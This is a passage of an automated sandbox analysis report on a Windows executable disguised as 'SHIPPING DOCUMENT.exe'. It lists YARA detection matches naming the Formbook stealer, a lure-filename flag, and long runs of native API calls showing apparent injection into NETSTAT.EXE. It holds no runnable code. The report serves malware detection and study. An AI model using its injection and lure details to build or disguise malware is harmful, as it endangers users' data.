          Source: 1.2.SHIPPING DOCUMENT.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.SHIPPING DOCUMENT.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.SHIPPING DOCUMENT.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.SHIPPING DOCUMENT.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.SHIPPING DOCUMENT.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.SHIPPING DOCUMENT.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.SHIPPING DOCUMENT.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.SHIPPING DOCUMENT.exe.23d0000.3.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.SHIPPING DOCUMENT.exe.23d0000.3.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.SHIPPING DOCUMENT.exe.23d0000.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.SHIPPING DOCUMENT.exe.23d0000.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Executable has a suspicious name (potential lure to open the executable)Show sources
          Source: SHIPPING DOCUMENT.exeStatic file information: Suspicious name
          Initial sample is a PE file and has a suspicious nameShow sources
          Source: initial sampleStatic PE information: Filename: SHIPPING DOCUMENT.exe
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00419D60 NtCreateFile,1_2_00419D60
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00419E10 NtReadFile,1_2_00419E10
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00419E90 NtClose,1_2_00419E90
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00419F40 NtAllocateVirtualMemory,1_2_00419F40
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00419D5A NtCreateFile,1_2_00419D5A
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00419E0A NtReadFile,1_2_00419E0A
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00419E8A NtClose,1_2_00419E8A
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00419F3A NtAllocateVirtualMemory,1_2_00419F3A
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B098F0 NtReadVirtualMemory,LdrInitializeThunk,1_2_00B098F0
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B09860 NtQuerySystemInformation,LdrInitializeThunk,1_2_00B09860
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B09840 NtDelayExecution,LdrInitializeThunk,1_2_00B09840
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B099A0 NtCreateSection,LdrInitializeThunk,1_2_00B099A0
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B09910 NtAdjustPrivilegesToken,LdrInitializeThunk,1_2_00B09910
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B09A20 NtResumeThread,LdrInitializeThunk,1_2_00B09A20
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B09A00 NtProtectVirtualMemory,LdrInitializeThunk,1_2_00B09A00
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B09A50 NtCreateFile,LdrInitializeThunk,1_2_00B09A50
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B095D0 NtClose,LdrInitializeThunk,1_2_00B095D0
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B09540 NtReadFile,LdrInitializeThunk,1_2_00B09540
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B096E0 NtFreeVirtualMemory,LdrInitializeThunk,1_2_00B096E0
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B09660 NtAllocateVirtualMemory,LdrInitializeThunk,1_2_00B09660
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B097A0 NtUnmapViewOfSection,LdrInitializeThunk,1_2_00B097A0
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B09780 NtMapViewOfSection,LdrInitializeThunk,1_2_00B09780
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B09710 NtQueryInformationToken,LdrInitializeThunk,1_2_00B09710
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B098A0 NtWriteVirtualMemory,1_2_00B098A0
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B09820 NtEnumerateKey,1_2_00B09820
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B0B040 NtSuspendThread,1_2_00B0B040
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B099D0 NtCreateProcessEx,1_2_00B099D0
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B09950 NtQueueApcThread,1_2_00B09950
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B09A80 NtOpenDirectoryObject,1_2_00B09A80
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B09A10 NtQuerySection,1_2_00B09A10
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B0A3B0 NtGetContextThread,1_2_00B0A3B0
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B09B00 NtSetValueKey,1_2_00B09B00
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B095F0 NtQueryInformationFile,1_2_00B095F0
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B0AD30 NtSetContextThread,1_2_00B0AD30
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B09520 NtWaitForSingleObject,1_2_00B09520
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B09560 NtWriteFile,1_2_00B09560
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B096D0 NtCreateKey,1_2_00B096D0
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B09610 NtEnumerateValueKey,1_2_00B09610
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B09670 NtQueryInformationProcess,1_2_00B09670
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B09650 NtQueryValueKey,1_2_00B09650
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B09FE0 NtCreateMutant,1_2_00B09FE0
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B09730 NtQueryVirtualMemory,1_2_00B09730
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B0A710 NtOpenProcessToken,1_2_00B0A710
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B09770 NtSetInformationFile,1_2_00B09770
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B0A770 NtOpenThread,1_2_00B0A770
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B09760 NtOpenProcess,1_2_00B09760
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_1_00419D60 NtCreateFile,1_1_00419D60
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_1_00419E10 NtReadFile,1_1_00419E10
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_1_00419E90 NtClose,1_1_00419E90
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_1_00419F40 NtAllocateVirtualMemory,1_1_00419F40
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03909780 NtMapViewOfSection,LdrInitializeThunk,8_2_03909780
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03909FE0 NtCreateMutant,LdrInitializeThunk,8_2_03909FE0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03909710 NtQueryInformationToken,LdrInitializeThunk,8_2_03909710
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_039096D0 NtCreateKey,LdrInitializeThunk,8_2_039096D0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_039096E0 NtFreeVirtualMemory,LdrInitializeThunk,8_2_039096E0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03909650 NtQueryValueKey,LdrInitializeThunk,8_2_03909650
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03909A50 NtCreateFile,LdrInitializeThunk,8_2_03909A50
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03909660 NtAllocateVirtualMemory,LdrInitializeThunk,8_2_03909660
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_039099A0 NtCreateSection,LdrInitializeThunk,8_2_039099A0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_039095D0 NtClose,LdrInitializeThunk,8_2_039095D0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03909910 NtAdjustPrivilegesToken,LdrInitializeThunk,8_2_03909910
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03909540 NtReadFile,LdrInitializeThunk,8_2_03909540
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03909840 NtDelayExecution,LdrInitializeThunk,8_2_03909840
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03909860 NtQuerySystemInformation,LdrInitializeThunk,8_2_03909860
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0390A3B0 NtGetContextThread,8_2_0390A3B0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_039097A0 NtUnmapViewOfSection,8_2_039097A0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0390A710 NtOpenProcessToken,8_2_0390A710
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03909B00 NtSetValueKey,8_2_03909B00
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03909730 NtQueryVirtualMemory,8_2_03909730
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03909770 NtSetInformationFile,8_2_03909770
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0390A770 NtOpenThread,8_2_0390A770
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03909760 NtOpenProcess,8_2_03909760
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03909A80 NtOpenDirectoryObject,8_2_03909A80
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03909610 NtEnumerateValueKey,8_2_03909610
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03909A10 NtQuerySection,8_2_03909A10
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03909A00 NtProtectVirtualMemory,8_2_03909A00
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03909A20 NtResumeThread,8_2_03909A20
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03909670 NtQueryInformationProcess,8_2_03909670
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_039099D0 NtCreateProcessEx,8_2_039099D0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_039095F0 NtQueryInformationFile,8_2_039095F0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0390AD30 NtSetContextThread,8_2_0390AD30
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03909520 NtWaitForSingleObject,8_2_03909520
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03909950 NtQueueApcThread,8_2_03909950
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03909560 NtWriteFile,8_2_03909560
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_039098A0 NtWriteVirtualMemory,8_2_039098A0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_039098F0 NtReadVirtualMemory,8_2_039098F0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03909820 NtEnumerateKey,8_2_03909820
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0390B040 NtSuspendThread,8_2_0390B040
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02DD9E90 NtClose,8_2_02DD9E90
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02DD9E10 NtReadFile,8_2_02DD9E10
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02DD9F40 NtAllocateVirtualMemory,8_2_02DD9F40
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02DD9D60 NtCreateFile,8_2_02DD9D60
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02DD9E8A NtClose,8_2_02DD9E8A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02DD9E0A NtReadFile,8_2_02DD9E0A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02DD9F3A NtAllocateVirtualMemory,8_2_02DD9F3A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02DD9D5A NtCreateFile,8_2_02DD9D5A
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 0_2_00403461 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403461
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 0_2_004069250_2_00406925
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_004010301_2_00401030
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_0041E1FC1_2_0041E1FC
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_0041D2601_2_0041D260
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_0041DA2A1_2_0041DA2A
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_0041BDC41_2_0041BDC4
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00402D901_2_00402D90
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00409E401_2_00409E40
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00409E3C1_2_00409E3C
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_0041D6DF1_2_0041D6DF
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_0041DFA31_2_0041DFA3
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00402FB01_2_00402FB0
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AF20A01_2_00AF20A0
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B920A81_2_00B920A8
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00ADB0901_2_00ADB090
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B810021_2_00B81002
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AE41201_2_00AE4120
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00ACF9001_2_00ACF900
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B922AE1_2_00B922AE
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AFEBB01_2_00AFEBB0
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B8DBD21_2_00B8DBD2
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B92B281_2_00B92B28
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AD841F1_2_00AD841F
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AF25811_2_00AF2581
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00ADD5E01_2_00ADD5E0
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AC0D201_2_00AC0D20
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B92D071_2_00B92D07
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B91D551_2_00B91D55
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B92EF71_2_00B92EF7
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AE6E301_2_00AE6E30
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B91FF11_2_00B91FF1
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_1_004010301_1_00401030
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_1_0041E1FC1_1_0041E1FC
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_1_0041D2601_1_0041D260
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_1_0041DA2A1_1_0041DA2A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038FEBB08_2_038FEBB0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0398DBD28_2_0398DBD2
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03991FF18_2_03991FF1
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03992B288_2_03992B28
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_039922AE8_2_039922AE
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03992EF78_2_03992EF7
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038E6E308_2_038E6E30
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038F25818_2_038F2581
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038DD5E08_2_038DD5E0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038CF9008_2_038CF900
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03992D078_2_03992D07
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038C0D208_2_038C0D20
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038E41208_2_038E4120
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03991D558_2_03991D55
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038DB0908_2_038DB090
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038F20A08_2_038F20A0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_039920A88_2_039920A8
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038D841F8_2_038D841F
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_039810028_2_03981002
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02DDE1FC8_2_02DDE1FC
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02DC9E408_2_02DC9E40
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02DC9E3C8_2_02DC9E3C
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02DC2FB08_2_02DC2FB0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02DDDFA38_2_02DDDFA3
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02DDBDC48_2_02DDBDC4
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02DC2D908_2_02DC2D90
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: String function: 038CB150 appears 35 times
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: String function: 00ACB150 appears 35 times
          Source: SHIPPING DOCUMENT.exe, 00000000.00000003.653383612.000000000338F000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs SHIPPING DOCUMENT.exe
          Source: SHIPPING DOCUMENT.exe, 00000001.00000002.700777505.0000000000D4F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs SHIPPING DOCUMENT.exe
          Source: SHIPPING DOCUMENT.exe, 00000001.00000002.700415930.000000000080A000.00000004.00000020.sdmpBinary or memory string: OriginalFilenamenetstat.exej% vs SHIPPING DOCUMENT.exe
          Source: SHIPPING DOCUMENT.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 00000000.00000002.661322620.00000000023D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.661322620.00000000023D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.700344342.0000000000710000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.700344342.0000000000710000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.915966424.0000000003210000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.915966424.0000000003210000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.700119931.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.700119931.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.915737678.0000000002DC0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.915737678.0000000002DC0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.915997507.0000000003240000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.915997507.0000000003240000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000001.656834932.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000001.656834932.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.700254188.00000000005A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.700254188.00000000005A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.SHIPPING DOCUMENT.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.SHIPPING DOCUMENT.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.SHIPPING DOCUMENT.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
